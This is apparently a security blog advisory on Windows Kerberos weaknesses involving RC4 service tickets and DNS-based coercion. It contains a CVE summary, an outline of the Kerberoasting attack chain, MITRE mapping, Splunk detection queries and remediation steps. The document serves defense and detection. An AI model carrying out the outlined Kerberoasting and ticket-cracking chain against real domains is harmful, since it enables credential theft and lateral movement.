Active Directory at Risk: New Windows Kerberos Weakness Enables Credential Theft and Lateral Movement

Aegiron 9 mins0

Product Details

Vendor: Microsoft
Product: Windows Active Directory – Kerberos / KDC (Key Distribution Center)
Affected Components:

  • Domain Controllers running Windows Server 2012 R2 (ESU), 2016, 2019, 2022, 2025
  • Kerberos authentication service (KDC)
  • Service account ticket issuance and encryption handling

Attack Surface: Internal network / domain environment
Authentication Required: Yes (low-privileged domain user or coerced authentication)
Primary Risk Areas:

  • Credential exposure
  • Lateral movement
  • Privilege escalation
  • Domain persistence

This vulnerability is particularly dangerous because it targets Kerberos, which is the backbone of authentication in almost every Windows enterprise environment.

CVE Overview – Basic Information Table

FieldDetails
Vulnerability NameWindows Kerberos Weak Encryption & Trust Handling Vulnerability
CVE IDsCVE-2026-20833, CVE-2026-20849
CVSS ScoreCVE-2026-20833: ~5.5 (Medium) / CVE-2026-20849: ~7.5 (High)
SeverityMedium to High (environment dependent)
ExploitabilityAuthenticated domain user or coerced authentication
Exploit AvailabilityPublic research and proof-of-concept techniques exist (educational / testing use only)
ImpactCredential theft, offline password cracking, Kerberos ticket abuse, privilege escalation
Persistence RiskHigh (Kerberos tickets can be reused and forged if secrets are exposed)
Official Patch / GuidanceMicrosoft Kerberos RC4 deprecation and KDC hardening update (link below)

Official Patch / Upgrade

Microsoft Official Guidance (Patch / Configuration Update):
https://support.microsoft.com/security/kerberos-rc4-kdc-guidance

This Microsoft guidance introduces audit and enforcement modes to phase out RC4 and strengthen Kerberos ticket security.
This is the authoritative and recommended remediation.

What Is the Vulnerability

This issue is not a single bug but a combination of weaknesses in how Kerberos handles encryption choices and trust decisions.

  1. Weak Encryption Handling (RC4)
    Some Windows environments still allow Kerberos service tickets to be issued using RC4 (etype 23). RC4 is cryptographically weak and allows attackers to take a captured service ticket and brute-force it offline to recover the service account password.
  2. Kerberos Trust and Input Handling
    In certain scenarios, Kerberos relies on information that can be influenced by the client or network (such as service principal names resolved through DNS). This allows attackers to manipulate how and where Kerberos tickets are requested and used.
  3. Real-World Impact
    When combined, these weaknesses allow attackers to:
    • Request Kerberos service tickets for high-value services
    • Capture those tickets
    • Crack them offline if weak encryption is used
    • Reuse recovered credentials for lateral movement or privilege escalation

This is especially dangerous in Active Directory environments with:

  • Legacy applications
  • Old service accounts
  • Poor Kerberos logging
  • Weak DNS controls

How This Vulnerability Can Be Exploited

This section is for defensive understanding only.

  1. Attacker gains any valid domain account (phishing, malware, reused password).
  2. Attacker enumerates service accounts and SPNs.
  3. Attacker forces Kerberos service ticket requests (Kerberoasting).
  4. If RC4 is enabled, attacker extracts ticket data.
  5. Ticket is cracked offline to recover service account credentials.
  6. Credentials are reused to:
    • Access servers
    • Move laterally
    • Escalate privileges
    • Potentially compromise the domain

In advanced cases, attackers abuse DNS CNAME manipulation or authentication coercion to trick clients into requesting Kerberos tickets for attacker-controlled services, enabling relay attacks.

MITRE ATT&CK Mapping

Primary Techniques

  • T1558 – Steal or Forge Kerberos Tickets
    • T1558.003 – Kerberoasting
    • T1558.001 – Golden Ticket (post-compromise)

Related Techniques

  • Credential Access
  • Lateral Movement
  • Privilege Escalation
  • Persistence via ticket reuse

Proof of Concept / Exploitation Availability

  • Public research and demonstration code exists showing:
    • Kerberos ticket extraction
    • DNS-based coercion of Kerberos authentication
    • Offline cracking of RC4-encrypted tickets
  • These techniques are widely understood and already used by attackers.
  • No zero-day exploit is required; this is abuse of existing behavior.

Defenders should assume active exploitation is feasible in unpatched or misconfigured environments.

Detection Strategy

Log Sources to Enable and Monitor

Log SourceWhy It Matters
Domain Controller Security LogsCore Kerberos activity
Windows Event Logs (Kerberos)Ticket requests and failures
DNS Server LogsDetect suspicious CNAME usage
Network Authentication LogsDetect relay and abnormal auth
SIEM (Splunk)Correlation and alerting

Critical Windows Event IDs

  • 4768 – TGT requested
  • 4769 – Service ticket requested (MOST IMPORTANT)
  • 4771 – Kerberos pre-authentication failed

Splunk Detection Rules

1. Detect RC4 / Weak Encryption Usage (High Priority)

Log Source: Windows Security Logs (Domain Controllers)

index=wineventlog EventCode=4769
| where TicketEncryptionType="0x17" OR TicketEncryptionType="RC4"
| stats count by AccountName, ServiceName, ClientAddress
| where count > 3

Why this matters:
Any RC4 usage in 2026 should be rare. This rule highlights potential Kerberoasting activity.

2. Detect Excessive Service Ticket Requests (Kerberoasting Pattern)

Log Source: Windows Security Logs

index=wineventlog EventCode=4769
| stats count by AccountName, ClientAddress span=5m
| where count > 10

Why this matters:
Normal users rarely request many service tickets in a short time.

3. Detect Suspicious Kerberos Failures (Pre-Auth Abuse)

Log Source: Windows Security Logs

index=wineventlog EventCode=4771
| stats count by ClientAddress, AccountName
| where count > 5

Why this matters:
Repeated failures may indicate brute forcing or coercion attempts.

4. Correlate DNS CNAME and Kerberos Requests

Log Sources: DNS Logs + Windows Security Logs

index=dns_logs record_type=CNAME
| join ClientAddress
    [ search index=wineventlog EventCode=4769 ]
| stats count by ClientAddress, query, ServiceName

Why this matters:
Helps identify DNS-based Kerberos coercion attempts.

Incident Response Guidance

  1. Identify affected service accounts immediately.
  2. Reset service account passwords.
  3. Apply Microsoft Kerberos hardening guidance.
  4. Disable RC4 wherever possible.
  5. Investigate lateral movement from affected accounts.
  6. Consider rotating krbtgt if compromise is suspected.

Why This Vulnerability Is Serious

This is not a flashy remote exploit.
This is worse.

It targets how trust works inside your domain.

If exploited successfully, attackers can:

  • Stay hidden
  • Move quietly
  • Reuse Kerberos tickets
  • Maintain long-term access

That is why Microsoft strongly recommends immediate configuration audits, not just patching.

Quick Action Checklist

  • Apply Microsoft Kerberos update and guidance
  • Disable RC4 / weak Kerberos encryption
  • Monitor Event ID 4769 aggressively
  • Audit service accounts and SPNs
  • Harden DNS and authentication paths

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.